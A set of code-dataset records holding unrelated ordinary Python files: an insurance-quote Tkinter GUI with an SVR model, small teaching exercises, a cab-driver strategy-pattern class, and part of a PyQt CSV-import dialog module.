= pd.read_excel('ml.xlsx')\nml2_train = ml2.drop('Gold', axis=1)\nalgo, name = SVR(kernel='rbf', C=1e3, gamma=0.1), 'SVR'\nx_train, x_test, y_train, y_test = train_test_split(ml2_train, ml2['Gold'], test_size=.1, random_state=11)\nalgo.fit(x_train, y_train)\n\n\n\n#name = 'DELUCCA,SHALEE V'\n\n\ndef getParam(id):\n url = 'https://v3v10.vitechinc.com/solr/v_us_quotes/select?indent=on&wt=json&rows=100000&q=id:'+ str(id)\n connection = urllib.request.urlopen(url)\n return pd.DataFrame(json.load(connection)['response']['docs'])\n\ndef find_customer():\n #query to find customer\n name = last.get() + \",\" + first.get()\n name = name.upper()\n url = 'https://v3v10.vitechinc.com/solr/v_us_participant/select?indent=on&wt=json&rows=1000&q=name:' + name + '&fl=name,DOB,sex'\n connection = urllib.request.urlopen(url)\n data = pd.DataFrame(json.load(connection)['response']['docs'])\n #print(data.to_string())\n ID_returned.set(next(iter(data['id'])))\n DOB_returned.set(next(iter(data['DOB']))[0:10])\n gender_returned.set(next(iter(data['sex'])))\n address_returned.set(next(iter(data['address'])) + \"\\n\" + next(iter(data['city'])).upper() + \", \" + next(iter(data['state'])).upper())\n\n quoteDataframe = getParam(next(iter(data['id'])))\n #print(quoteDataframe.to_string())\n\n bronze.set(next(iter(quoteDataframe['BRONZE'])))\n silver.set(next(iter(quoteDataframe['SILVER'])))\n gold.set(next(iter(quoteDataframe['GOLD'])))\n platinum.set(next(iter(quoteDataframe['PLATINUM'])))\n purchased.set(next(iter(quoteDataframe['PURCHASED'])).upper())\n\n calculate_quote()\n\n\n\ndef calculate_quote():\n #use machine learning to get price\n a = age.get()\n inc = income.get()/10000\n ppl = num_people.get()\n if married == \"Single\":\n mar = 0\n else:\n mar=1\n if tobacco == \"No\":\n dip = 0\n else:\n dip =1\n if employment == \"Unemployed\":\n job = 0\n else:\n job =1\n if gender == \"F\":\n sex = 0\n else:\n sex = 1\n\n l = low.get()\n m = med.get()\n h = high.get()\n pred1 = algo.predict([[a, inc, ppl, mar, dip, job, sex, l, m, h]])[0]\n pred1\n\n\n bronze_quote.set(\"TBD\")\n silver_quote.set(\"TBD\")\n gold_quote.set(str(pred1))\n platinum_quote.set(\"TBD\")\n plan_quote.set(\"TBD\")\n\n\n#CREATE TABS\ntabControl = ttk.Notebook(win)\ntab1 = ttk.Frame(tabControl)\ntab2 = ttk.Frame(tabControl)\ntab3 = ttk.Frame(tabControl)\ntab4 = ttk.Frame(tabControl)\ntabControl.add(tab1, text=\"Request Quote\")\ntabControl.add(tab2, text=\"Search\")\ntabControl.add(tab3, text=\"Coverage Map\")\ntabControl.add(tab4, text=\"Statistics\")\ntabControl.pack(expand=1, fill=\"both\")\n\n\n#age, income/10000, #people on plan, marriage status (1=married), tobacco, employment status, sex, #low risk, #med risk, #high\n#QUOTE TAB\nquote = ttk.LabelFrame(tab1)\nquote.grid(column=0,row=0,padx=8,pady=4)\nttk.Label(quote, text=\"Gender:\").grid(column=0,row=1,sticky=tk.W)\nttk.Label(quote, text=\"Age:\").grid(column=0,row=2,sticky=tk.W)\nttk.Label(quote, text=\"Number of High Risk Conditions:\").grid(column=0,row=3,sticky=tk.W)\nttk.Label(quote, text=\"Number of Medium Risk Conditions:\").grid(column=0,row=4,sticky=tk.W)\nttk.Label(quote, text=\"Number of Low Risk Conditions:\").grid(column=0,row=5,sticky=tk.W)\nttk.Label(quote, text=\"Income:\").grid(column=0,row=6,sticky=tk.W)\nttk.Label(quote, text=\"Number of People on Plan:\").grid(column=0,row=7,sticky=tk.W)\nttk.Label(quote, text=\"Marital Status:\").grid(column=0,row=8,sticky=tk.W)\nttk.Label(quote, text=\"Tobacce Use:\").grid(column=0,row=9,sticky=tk.W)\nttk.Label(quote, text=\"Employment Status:\").grid(column=0,row=10,sticky=tk.W)\nget_quote = ttk.Button(quote, text=\"Get Quote\", command = calculate_quote).grid(column=0,row=11,pady=20,sticky=tk.W)\nttk.Label(quote, text=\"Bronze Plan Quote:\").grid(column=0,row=12,sticky=tk.W)\nttk.Label(quote, text=\"Silver Plan Quote\").grid(column=0,row=13,sticky=tk.W)\nttk.Label(quote, text=\"Gold Plan Quote:\").grid(column=0,row=14,sticky=tk.W)\nttk.Label(quote, text=\"Platinum Plan Quote:\").grid(column=0,row=15,sticky=tk.W)\nttk.Label(quote, text=\"Plan Recommendation:\").grid(column=0,row=16,sticky=tk.W)\n\n\ngender = tk.StringVar()\nage = tk.IntVar()\nhigh = tk.IntVar()\nmed = tk.IntVar()\nlow = tk.IntVar()\nincome = tk.DoubleVar()\nnum_people = tk.IntVar()\nmarried = tk.StringVar()\ntobacco = tk.StringVar()\nemployment = tk.StringVar()\nbronze_quote = StringVar()\nsilver_quote = StringVar()\ngold_quote = StringVar()\nplatinum_quote = StringVar()\nplan_quote = StringVar()\n\n\ngender_entered = ttk.Combobox(quote, width=12, textvariable=gender, state='readonly')\ngender_entered['values']=(\"F\", \"M\")\ngender_entered.grid(column=1, row=1,sticky=tk.W)\nttk.Entry(quote, width=12, textvariable=age).grid(column=1,row=2,sticky=tk.W)\nnum_high_cond = ttk.Entry(quote, width = 12, textvariable=high).grid(column=1, row=3,sticky=tk.W)\nnum_med_cond = ttk.Entry(quote, width = 12, textvariable=med).grid(column=1, row=4,sticky=tk.W)\nnum_low_cond = ttk.Entry(quote, width = 12, textvariable=low).grid(column=1, row=5,sticky=tk.W)\nttk.Entry(quote, width = 12, textvariable=income).grid(column=1, row=6,sticky=tk.W)\nttk.Entry(quote, width = 12, textvariable=num_people).grid(column=1, row=7,sticky=tk.W)\nmarried_entered = ttk.Combobox(quote, width=12, textvariable=married, state='readonly')\nmarried_entered['values']=(\"Single\", \"Married\")\nmarried_entered.grid(column=1, row=8,sticky=tk.W)\ntobacco_entered = ttk.Combobox(quote, width=12, textvariable=tobacco, state='readonly')\ntobacco_entered['values']=(\"No\", \"Yes\")\ntobacco_entered.grid(column=1, row=9,sticky=tk.W)\nemploy_entered = ttk.Combobox(quote, width=12, textvariable=employment, state='readonly')\nemploy_entered['values']=(\"Unemployed\", \"Employed\")\nemploy_entered.grid(column=1, row=10,sticky=tk.W)\nttk.Label(quote, textvariable = bronze_quote).grid(column=1,row=12,sticky=tk.W)\nttk.Label(quote, textvariable = silver_quote).grid(column=1,row=13,sticky=tk.W)\nttk.Label(quote, textvariable = gold_quote).grid(column=1,row=14,sticky=tk.W)\nttk.Label(quote, textvariable = platinum_quote).grid(column=1,row=15,sticky=tk.W)\nttk.Label(quote, textvariable = plan_quote).grid(column=1,row=16,sticky=tk.W)\n\n\n#SEARCH TAB\nsearch = ttk.LabelFrame(tab2)\nsearch.grid(column=0,row=0,padx=8,pady=4)\n\n\nttk.Label(search, text=\"Customer Last Name:\").grid(column=0,row=1,sticky=tk.W)\nttk.Label(search, text=\"Customer First Name:\").grid(column=0,row=2,sticky=tk.W)\nsearch_button = ttk.Button(search, text=\"Search\", command=find_customer).grid(column=0,row=3,pady=12,sticky=tk.W)\nttk.Label(search, text=\"Customer ID:\").grid(column=0,row=4,sticky=tk.W)\nttk.Label(search, text=\"Date of Birth:\").grid(column=0,row=5,sticky=tk.W)\nttk.Label(search, text=\"Gender:\").grid(column=0,row=6,sticky=tk.W)\nttk.Label(search, text=\"Address:\").grid(column=0,row=7,pady=12,sticky=tk.W)\nttk.Label(search, text=\"ACTUAL\").grid(column=1,row=8, pady=4, sticky=tk.W)\nttk.Label(search, text=\"PREDICTED\").grid(column=2,row=8, padx=16,pady=4, sticky=tk.W)\nttk.Label(search, text=\"Bronze Plan Price:\").grid(column=0,row=9,sticky=tk.W)\nttk.Label(search, text=\"Silver Plan Price\").grid(column=0,row=10,sticky=tk.W)\nttk.Label(search, text=\"Gold Plan Price:\").grid(column=0,row=11,sticky=tk.W)\nttk.Label(search, text=\"Platinum Plan Price:\").grid(column=0,row=12,sticky=tk.W)\nttk.Label(search, text=\"Purchased Plan:\").grid(column=0,row=13,sticky=tk.W)\n\nfirst = tk.StringVar()\nlast = tk.StringVar()\nID_returned = tk.StringVar()\nDOB_returned = tk.StringVar()\ngender_returned = tk.StringVar()\naddress_returned = tk.StringVar()\nbronze = tk.StringVar()\nsilver = tk.StringVar()\ngold = tk.StringVar()\nplatinum = tk.StringVar()\npurchased = tk.StringVar()\n\n\nfirst_entered = ttk.Entry(search, width=12, textvariable=first).grid(column=1,row=1,sticky=tk.W)\nlast_entered = ttk.Entry(search, width=12, textvariable=last).grid(column=1,row=2,sticky=tk.W)\nttk.Label(search, textvariable = ID_returned).grid(column=1,row=4,sticky=tk.W)\nttk.Label(search, textvariable = DOB_returned).grid(column=1,row=5,sticky=tk.W)\nttk.Label(search, textvariable = gender_returned).grid(column=1,row=6,sticky=tk.W)\nttk.Label(search, textvariable = address_returned).grid(column=1,row=7,sticky=tk.W)\nttk.Label(search, textvariable = bronze).grid(column=1,row=9,sticky=tk.W)\nttk.Label(search, textvariable = silver).grid(column=1,row=10,sticky=tk.W)\nttk.Label(search, textvariable = gold).grid(column=1,row=11,sticky=tk.W)\nttk.Label(search, textvariable = platinum).grid(column=1,row=12,sticky=tk.W)\nttk.Label(search, textvariable = purchased).grid(column=1,row=13,sticky=tk.W)\n\n#compare quote\nttk.Label(search, textvariable = bronze_quote).grid(column=2,row=9,padx=16,sticky=tk.W)\nttk.Label(search, textvariable = silver_quote).grid(column=2,row=10,padx=16,sticky=tk.W)\nttk.Label(search, textvariable = gold_quote).grid(column=2,row=11,padx=16,sticky=tk.W)\nttk.Label(search, textvariable = platinum_quote).grid(column=2,row=12,padx=16,sticky=tk.W)\nttk.Label(search, textvariable = plan_quote).grid(column=2,row=13,padx=16,sticky=tk.W)\n\n\n#MAP TAB\nmap_tab = ttk.LabelFrame(tab3)\nmap_tab.grid(column=0,row=0,padx=8,pady=4)\n\nmap_image = PhotoImage(file='/Users/Maddie/Desktop/populationdensity.gif')\nmap_button = ttk.Button(map_tab, image=map_image)\nmap_button.pack()\n\n\n#STAT TAB\nstats = ttk.LabelFrame(tab4)\nstats.grid(column=0,row=0,padx=8,pady=4)\n\nstat_image = PhotoImage(file='/Users/Maddie/Desktop/graph.gif')\nstat_button= ttk.Button(stats, image=stat_image)\nstat_button.pack()\n\n\n\n\n\nwin.mainloop()\n","repo_name":"cameronjump/HacklahomaVitechFun","sub_path":"GUIwithMachineLearning.py","file_name":"GUIwithMachineLearning.py","file_ext":"py","file_size_in_byte":9802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24767438861","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 27 12:58:34 2017\n\n@author: sap21\n\"\"\"\n\n# hansard.py\n'''\ninto = '.,?()!:-\"' # [\".\",\",\",\"?\"]\nout = \" \"\npunctuation = str.maketrans(into,out)\n\nspeech = open(\"PMQs_181017.txt\")\nfor line in speech:\n line.translate(punctuation)\nspeech.close()\n'''\n\n# exercise 1\ndef remove_punctuation(text):\n into = '.,?()!:-\"' # [\".\",\",\",\"?\"]\n out = \" \"\n punctuation = str.maketrans(into,out)\n\n for line in text:\n string = line.translate(punctuation)\n return string\n ","repo_name":"sap218/python","sub_path":"csm0120/04/hansard.py","file_name":"hansard.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71878404279","text":"from collections import defaultdict\r\nfrom abc import ABC,abstractmethod\r\n#stratedy method\r\ndef Suggest_Driver(car_dict,cab_name,cab_dest=None):\r\n if(cab_name not in car_dict):\r\n return \"Select Another Car Sir!!\"\r\n else:\r\n \r\n driver_name=''\r\n min_dist=10**9\r\n for driver in car_dict[cab_name]:\r\n if(float(driver[1])<4):\r\n continue \r\n else:\r\n if(driver[2]<=min_dist and cab_dest is None):\r\n min_dist=driver[2]\r\n driver_name=driver[0]\r\n elif(driver[2]<=min_dist and cab_dest is not None and cab_dest in driver[3]):\r\n min_dist=driver[2]\r\n driver_name=driver[0]\r\n if(len(driver_name)==0 ):\r\n return \"Could not find suitabel driver for your destination\"\r\n return driver_name\r\nclass Caluclate_Fair(ABC):\r\n @abstractmethod\r\n def Calculate_Fair_taxi(self,cust_distance):\r\n pass \r\nclass Driver_Suggestion:\r\n def __init__(self,car_dict,strategy=None):\r\n self.car_dict=car_dict\r\n self.strategy=strategy\r\n \r\n def Get_Driver_Status(self,cab_name,dest=None):\r\n self.strategy=Suggest_Driver\r\n driver_name=self.strategy(self.car_dict, cab_name,dest)\r\n return driver_name\r\n \r\n \r\n \r\nclass Register_Cab(Driver_Suggestion):\r\n cab_dict=defaultdict(list)\r\n def __init__(self,driver_name=None,cab_model=None,rating=None,dfc=None,dest=None): \r\n self.driver_name=driver_name\r\n self.cab_model=cab_model\r\n self.rating=rating\r\n if(dest is not None):\r\n self.dest=set(dest)\r\n else:\r\n self.dest=dest\r\n self.dfc=dfc \r\n Register_Cab.cab_dict[self.cab_model].append([self.driver_name,self.rating,self.dfc,self.dest])\r\n Driver_Suggestion.__init__(self, Register_Cab.cab_dict)\r\n def Calculate_Fair_taxi(self,cust_distance):\r\n return cust_distance*8\r\n # @staticmethod #utility method\r\n # def Calculate_Fair_taxi(cust_distance):\r\n # return cust_distance*8\r\n \r\n \r\n# #input\r\n# def Amin_input(): \r\n# taxi_num=int(input(\"Enter The total taxi:\"))\r\n# for i in range(taxi_num):\r\n# driver_name=input(\"Enter driver name:\")\r\n# cab_model=input(\"Enter cab model:\")\r\n# rating=float(input(\"Enter druver rating:\"))\r\n# dfc=input(\"Enter distance from customer:\")\r\n# dfc=dfc.split()\r\n# if(dfc[1]=='Km'):\r\n# dfc=int(dfc[0])*1000\r\n# else:\r\n# dfc=int(dfc[0])\r\n# dest=list(map(str,input(\"Enter destination details if any\").split()))\r\n# taxi=Register_Cab(driver_name,cab_model,rating,dfc,dest)\r\n# def User_input():\r\n# dist=input(\"Enter total distance:\")\r\n# cab=input(\"ENter car name:\")\r\n# des=list(map(str,input(\"Enter destination details if any\").split()))\r\n# taxi=Register_Cab()\r\n# print(taxi.Get_Driver_Status(cab,des))\r\n# print(taxi.Calculate_Fair_taxi(dist))\r\n# Amin_input()\r\n# User_input()\r\n \r\n \r\n#main function\r\n\r\n# taxi=Register_Cab('A', 'HatchBack', 4 ,500)\r\n# taxi=Register_Cab('B' ,'HatchBack' ,4.3, 1000)\r\n# taxi=Register_Cab('C','5SEATER',4.8,200)\r\n# taxi=Register_Cab('D','Sedan',4.1,700)\r\n# taxi=Register_Cab('E','HatchBack',4.8,430)\r\n# fair=Register_Cab.Calculate_Fair_taxi(20.5)\r\n# driver_status=taxi.Get_Driver_Status('HatchBack')\r\n# print(fair)\r\n# print(driver_status)\r\n\r\n# # # #test case 2;---\r\ntaxi=Register_Cab('A', '5SEATER', 4 ,500,[\"Gurgaon\", \"Noida\", \"Delhi\"])\r\ntaxi=Register_Cab('B' ,'HatchBack' ,4.3, 1000,[\"Gurgaon\"])\r\ntaxi=Register_Cab('C','5SEATER',4.8,200,[\"Noida\"])\r\ntaxi=Register_Cab('D','Sedan',4.1,700,[\"Noida\"])\r\ntaxi=Register_Cab('E','5SEATER',4.7,430,[\"Delhi\"])\r\nfair=taxi.Calculate_Fair_taxi(60)\r\ndriver_status=taxi.Get_Driver_Status(\"5SEATER\",\"Delhi\")\r\nprint(fair)\r\nprint(driver_status)\r\n# # print(Register_Cab.cab_dict)\r\n\r\n# # test case 3\r\n# taxi=Register_Cab('A', 'Sedan', 4 ,500)\r\n# taxi=Register_Cab('B' ,'HatchBack' ,4.3, 1000)\r\n# taxi=Register_Cab('C','5SEATER',4.8,200)\r\n# taxi=Register_Cab('D','Sedan',4.1,700)\r\n# taxi=Register_Cab('E','HatchBack',4.8,430)\r\n# fair=taxi.Calculate_Fair_taxi(20.5)\r\n# driver_status=taxi.Get_Driver_Status('HatchBack')\r\n# print(fair)\r\n# print(driver_status)\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"123ayush-abs/Object_oriented_design_patterns_problems","sub_path":"rent_optimized.py","file_name":"rent_optimized.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"40991286252","text":"C = int(input())\n\nfor i in range(C) :\n N = list(map(int, input().split()))\n avg = sum(N[1:]) / N[0]\n over = 0\n\n for k in N[1:] :\n if k > avg :\n over += 1\n su = over / N[0] * 100\n print(\"{:.3f}%\".format(su))\n","repo_name":"toppingh/algorithm","sub_path":"4344번.py","file_name":"4344번.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72595181240","text":"from __future__ import absolute_import, division, print_function\nimport math, time\nimport os, types, io\nimport string, copy\nfrom collections import OrderedDict\n\nimport pandas as pd\n\ntry:\n import configparser\nexcept:\n import ConfigParser as configparser\nfrom .qt import *\nfrom . import util, core\n\nmodule_path = os.path.dirname(os.path.abspath(__file__))\niconpath = os.path.join(module_path, 'icons')\n\n\nclass PseudoWidget:\n def __init__(self, val):\n self.val = val\n\n def value(self):\n return self.val\n\n def clear(self):\n pass\n\n def addItems(self, *args):\n pass\n\n\ndef dialogFromOptions(parent, opts, sections=None,\n wrap=2, section_wrap=4,\n style=None):\n \"\"\"\n Get Qt widgets dialog from a dictionary of options.\n Args:\n opts: options dictionary\n sections:\n section_wrap: how many sections in one row\n style: stylesheet css if required\n \"\"\"\n\n sizepolicy = QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)\n sizepolicy.setHorizontalStretch(0)\n sizepolicy.setVerticalStretch(0)\n\n if style == None:\n style = '''\n QLabel {\n font-size: 14px;\n }\n QPlainTextEdit {\n max-height: 80px;\n }\n '''\n\n if sections == None:\n sections = {'options': opts.keys()}\n\n widgets = {}\n dialog = QWidget(parent)\n dialog.setSizePolicy(sizepolicy)\n\n l = QGridLayout(dialog)\n l.setSpacing(1)\n l.setAlignment(QtCore.Qt.AlignLeft)\n scol = 1\n srow = 1\n for s in sections:\n row = srow\n col = 1\n if [1 for op in sections[s] if opts[op][\"type\"] != \"none\"]:\n f = QWidget()\n\n l.addWidget(f, row, scol)\n gl = QGridLayout(f)\n gl.setAlignment(QtCore.Qt.AlignTop)\n gl.setSpacing(3)\n\n for o in sections[s]:\n label = o\n opt = opts[o]\n val = opt['default']\n t = opt['type']\n if t == \"none\":\n widgets[o] = PseudoWidget(val)\n continue\n if 'label' in opt:\n label = opt['label']\n\n lbl = QLabel(label)\n gl.addWidget(lbl, row, col)\n lbl.setStyleSheet(style)\n if t == 'combobox':\n w = QComboBox()\n w.addItems(opt['items'])\n index = w.findText(val)\n if index != -1:\n w.setCurrentIndex(index)\n if 'editable' in opt:\n w.setEditable(True)\n if 'width' in opt:\n w.setMinimumWidth(opt['width'])\n w.resize(opt['width'], 20)\n elif t == 'list':\n w = QListWidget()\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(opt['items'])\n elif t == 'entry':\n w = QLineEdit()\n w.setText(str(val))\n if 'width' in opt:\n w.setMaximumWidth(opt['width'])\n w.resize(opt['width'], 20)\n elif t == 'textarea':\n w = QPlainTextEdit()\n # w.setSizePolicy(sizepolicy)\n w.insertPlainText(str(val))\n elif t == 'slider':\n w = QSlider(QtCore.Qt.Horizontal)\n s, e = opt['range']\n w.setTickInterval(opt['interval'])\n w.setSingleStep(opt['interval'])\n w.setMinimum(s)\n w.setMaximum(e)\n w.setTickPosition(QSlider.TicksBelow)\n w.setValue(val)\n elif t == 'spinbox':\n if type(val) is float:\n w = QDoubleSpinBox()\n else:\n w = QSpinBox()\n w.setValue(val)\n if 'range' in opt:\n min, max = opt['range']\n w.setRange(min, max)\n w.setMinimum(min)\n if 'interval' in opt:\n w.setSingleStep(opt['interval'])\n elif t == 'checkbox':\n w = QCheckBox()\n w.setChecked(val)\n elif t == 'font':\n w = QFontComboBox()\n index = w.findText(val)\n # w.resize(w.sizeHint())\n w.setCurrentIndex(index)\n else:\n raise ValueError(f\"{lbl} option has unavailable type '{t}'\")\n col += 1\n gl.addWidget(w, row, col)\n w.setStyleSheet(style)\n widgets[o] = w\n # print (o, row, col)\n if col >= wrap:\n col = 1\n row += 1\n else:\n col += 2\n\n if scol >= section_wrap:\n scol = 1\n srow += 2\n else:\n scol += 1\n return dialog, widgets\n\n\ndef getWidgetValues(widgets):\n \"\"\"Get values back from a set of widgets\"\"\"\n\n kwds = {}\n for i in widgets:\n val = None\n if i in widgets:\n w = widgets[i]\n if type(w) is QLineEdit:\n val = w.text()\n elif type(w) is QPlainTextEdit:\n val = w.toPlainText()\n elif type(w) is QComboBox or type(w) is QFontComboBox:\n val = w.currentText()\n elif type(w) is QListWidget:\n val = [i.text() for i in w.selectedItems()]\n elif type(w) is QCheckBox:\n val = w.isChecked()\n elif type(w) in [QSpinBox, QDoubleSpinBox, QSlider, PseudoWidget]:\n val = w.value()\n if val != None:\n kwds[i] = val\n kwds = kwds\n return kwds\n\n\ndef setWidgetValues(widgets, values):\n \"\"\"Set values for a set of widgets from a dict\"\"\"\n\n kwds = {}\n for i in values:\n val = values[i]\n if i in widgets:\n # print (i, val, type(val))\n w = widgets[i]\n if type(w) is QLineEdit:\n w.setText(str(val))\n elif type(w) is QPlainTextEdit:\n w.insertPlainText(str(val))\n elif type(w) is QComboBox or type(w) is QFontComboBox:\n index = w.findText(val)\n w.setCurrentIndex(index)\n elif type(w) is QCheckBox:\n w.setChecked(val)\n elif type(w) is QSlider:\n w.setValue(val)\n elif type(w) in [QSpinBox, QDoubleSpinBox]:\n w.setValue(val)\n return\n\n\ndef addToolBarItems(toolbar, parent, items):\n \"\"\"Populate toolbar from dict of items\"\"\"\n\n for i in items:\n if 'file' in items[i]:\n iconfile = os.path.join(iconpath, items[i]['file'] + '.png')\n icon = QIcon(iconfile)\n else:\n icon = QIcon.fromTheme(items[i]['icon'])\n btn = QAction(icon, i, parent)\n btn.triggered.connect(items[i]['action'])\n if 'shortcut' in items[i]:\n btn.setShortcut(QKeySequence(items[i]['shortcut']))\n # btn.setCheckable(True)\n toolbar.addAction(btn)\n return toolbar\n\n\nclass PlainTextEditor(QPlainTextEdit):\n def __init__(self, parent=None, **kwargs):\n super(PlainTextEditor, self).__init__(parent, **kwargs)\n font = QFont(\"Monospace\")\n font.setPointSize(10)\n font.setStyleHint(QFont.TypeWriter)\n self.setFont(font)\n return\n\n def zoom(self, delta):\n if delta < 0:\n self.zoomOut(1)\n elif delta > 0:\n self.zoomIn(1)\n\n def contextMenuEvent(self, event):\n\n menu = QMenu(self)\n copyAction = menu.addAction(\"Copy\")\n clearAction = menu.addAction(\"Clear\")\n zoominAction = menu.addAction(\"Zoom In\")\n zoomoutAction = menu.addAction(\"Zoom Out\")\n action = menu.exec_(self.mapToGlobal(event.pos()))\n if action == copyAction:\n self.copy()\n elif action == clearAction:\n self.clear()\n elif action == zoominAction:\n self.zoom(1)\n elif action == zoomoutAction:\n self.zoom(-1)\n\n\nclass TextDialog(QDialog):\n \"\"\"Text edit dialog\"\"\"\n\n def __init__(self, parent, text='', title='Text', width=400, height=300):\n super(TextDialog, self).__init__(parent)\n self.resize(width, height)\n self.setWindowTitle(title)\n vbox = QVBoxLayout(self)\n b = self.textbox = PlainTextEditor(self)\n b.insertPlainText(text)\n b.move(10, 10)\n b.resize(400, 300)\n vbox.addWidget(self.textbox)\n # self.b.setFontFamily('fixed')\n buttonbox = QDialogButtonBox(self)\n buttonbox.setStandardButtons(QDialogButtonBox.Ok)\n buttonbox.button(QDialogButtonBox.Ok).clicked.connect(self.close)\n vbox.addWidget(buttonbox)\n self.show()\n return\n\n\nclass MultipleInputDialog(QDialog):\n \"\"\"Qdialog with multiple inputs\"\"\"\n\n def __init__(self, parent, options=None, title='Input', width=400, height=200):\n super(MultipleInputDialog, self).__init__(parent)\n self.values = None\n self.accepted = False\n self.setMinimumSize(width, height)\n self.setWindowTitle(title)\n dialog, self.widgets = dialogFromOptions(self, options)\n vbox = QVBoxLayout(self)\n vbox.addWidget(dialog)\n buttonbox = QDialogButtonBox(self)\n buttonbox.setStandardButtons(QDialogButtonBox.Cancel | QDialogButtonBox.Ok)\n buttonbox.button(QDialogButtonBox.Ok).clicked.connect(self.accept)\n buttonbox.button(QDialogButtonBox.Cancel).clicked.connect(self.close)\n vbox.addWidget(buttonbox)\n self.show()\n return self.values\n\n def accept(self):\n self.values = getWidgetValues(self.widgets)\n self.accepted = True\n self.close()\n return\n\n\nclass ImportDialog(QDialog):\n \"\"\"Provides a dialog for import settings\"\"\"\n\n def __init__(self, parent=None, filename=None):\n\n super(ImportDialog, self).__init__(parent)\n self.parent = parent\n self.filename = filename\n self.df = None\n self.setGeometry(QtCore.QRect(250, 250, 900, 600))\n self.setGeometry(\n QStyle.alignedRect(\n QtCore.Qt.LeftToRight,\n QtCore.Qt.AlignCenter,\n self.size(),\n QGuiApplication.primaryScreen().availableGeometry(),\n ))\n self.setWindowTitle('Import File')\n self.createWidgets()\n self.update()\n self.show()\n return\n\n def createWidgets(self):\n \"\"\"Create widgets\"\"\"\n\n delimiters = [',', r'\\t', ' ', '\\s+', ';', '/', '&', '|', '^', '+', '-']\n encodings = ['utf-8', 'ascii', 'latin-1', 'iso8859_15', 'cp037', 'cp1252', 'big5', 'euc_jp']\n timeformats = ['infer', '%d/%m/%Y', '%Y/%m/%d', '%Y/%d/%m',\n '%Y-%m-%d %H:%M:%S', '%Y-%m-%d %H:%M',\n '%d-%m-%Y %H:%M:%S', '%d-%m-%Y %H:%M']\n grps = {'formats': ['sep', 'decimal', 'comment'],\n 'data': ['skiprows', 'skipinitialspace',\n 'skip_blank_lines', 'parse_dates', 'encoding', 'time format'],\n 'other': ['rowsperfile']}\n grps = OrderedDict(sorted(grps.items()))\n opts = self.opts = {'sep': {'type': 'combobox', 'default': ',', 'editable': True,\n 'items': delimiters, 'tooltip': 'seperator'},\n # 'header':{'type':'entry','default':0,'label':'header',\n # 'tooltip':'position of column header'},\n # 'index_col':{'type':'spinbox','default':-1,'range':(-1,1000),'label':'index column',\n # 'tooltip':''},\n 'decimal': {'type': 'combobox', 'default': '.', 'items': ['.', ','],\n 'tooltip': 'decimal point symbol'},\n 'comment': {'type': 'entry', 'default': '#', 'label': 'comment',\n 'tooltip': 'comment symbol'},\n 'skipinitialspace': {'type': 'checkbox', 'default': 0, 'label': 'skip initial space',\n 'tooltip': 'skip initial space'},\n 'skiprows': {'type': 'spinbox', 'default': 0, 'label': 'skiprows',\n 'tooltip': 'rows to skip'},\n 'skip_blank_lines': {'type': 'checkbox', 'default': 0, 'label': 'skip blank lines',\n 'tooltip': 'do not use blank lines'},\n 'parse_dates': {'type': 'checkbox', 'default': 1, 'label': 'parse dates',\n 'tooltip': 'try to parse date/time columns'},\n 'time format': {'type': 'combobox', 'default': '', 'items': timeformats,\n 'tooltip': 'date/time format'},\n 'encoding': {'type': 'combobox', 'default': 'utf-8', 'items': encodings,\n 'tooltip': 'file encoding'},\n # 'prefix':{'type':'entry','default':None,'label':'prefix',\n # 'tooltip':''}\n 'rowsperfile': {'type': 'spinbox', 'default': 0, 'label': 'rows per file',\n 'tooltip': 'rows to read'},\n # 'names':{'type':'entry','default':'','label':'column names',\n # 'tooltip':'col labels'},\n }\n\n optsframe, self.widgets = dialogFromOptions(self, opts, grps, wrap=1, section_wrap=1)\n layout = QGridLayout()\n layout.setColumnStretch(1, 2)\n layout.addWidget(optsframe, 1, 1)\n optsframe.setMaximumWidth(300)\n bf = self.createButtons(optsframe)\n layout.addWidget(bf, 2, 1)\n\n main = QSplitter(self)\n main.setOrientation(QtCore.Qt.Vertical)\n layout.addWidget(main, 1, 2, 2, 1)\n\n self.textarea = PlainTextEditor(main)\n main.addWidget(self.textarea)\n self.textarea.resize(200, 200)\n\n t = self.previewtable = core.DataFrameTable(main, font=core.FONT)\n main.addWidget(t)\n self.setLayout(layout)\n return\n\n def createButtons(self, parent):\n\n bw = self.button_widget = QWidget(parent)\n vbox = QVBoxLayout(bw)\n button = QPushButton(\"Update\")\n button.clicked.connect(self.update)\n vbox.addWidget(button)\n button = QPushButton(\"Import\")\n button.clicked.connect(self.doImport)\n vbox.addWidget(button)\n button = QPushButton(\"Cancel\")\n button.clicked.connect(self.quit)\n vbox.addWidget(button)\n return bw\n\n def showText(self):\n \"\"\"Show text contents\"\"\"\n\n with open(self.filename, 'r') as stream:\n try:\n text = stream.read()\n except:\n text = 'failed to preview, check encoding and then update preview\\n'\n self.textarea.clear()\n self.textarea.insertPlainText(text)\n self.textarea.verticalScrollBar().setValue(1)\n return\n\n def update(self):\n \"\"\"Reload previews\"\"\"\n\n self.showText()\n self.values = getWidgetValues(self.widgets)\n timeformat = self.values['time format']\n if timeformat == 'infer':\n dateparse = None\n else:\n dateparse = lambda x: pd.datetime.strptime(x, timeformat)\n del self.values['time format']\n del self.values['rowsperfile']\n for k in self.values:\n if self.values[k] == '':\n self.values[k] = None\n # if self.values['index_col'] == -1:\n # self.values['index_col'] = None\n\n try:\n f = pd.read_csv(self.filename, chunksize=400, error_bad_lines=False,\n warn_bad_lines=False, date_parser=dateparse, **self.values)\n except Exception as e:\n print('read csv error')\n print(e)\n return\n try:\n df = f.get_chunk()\n except UnicodeDecodeError:\n print('unicode error')\n df = pd.DataFrame()\n except pd.errors.ParserError:\n print('parser error')\n df = pd.DataFrame()\n\n self.previewtable.model.df = df\n self.previewtable.refresh()\n return\n\n def doImport(self):\n \"\"\"Do the import\"\"\"\n\n self.update()\n self.df = 